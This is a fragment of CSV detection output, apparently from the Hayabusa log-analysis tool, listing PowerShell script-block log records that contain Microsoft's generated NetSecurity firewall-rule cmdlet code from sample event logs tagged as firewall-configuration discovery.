(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
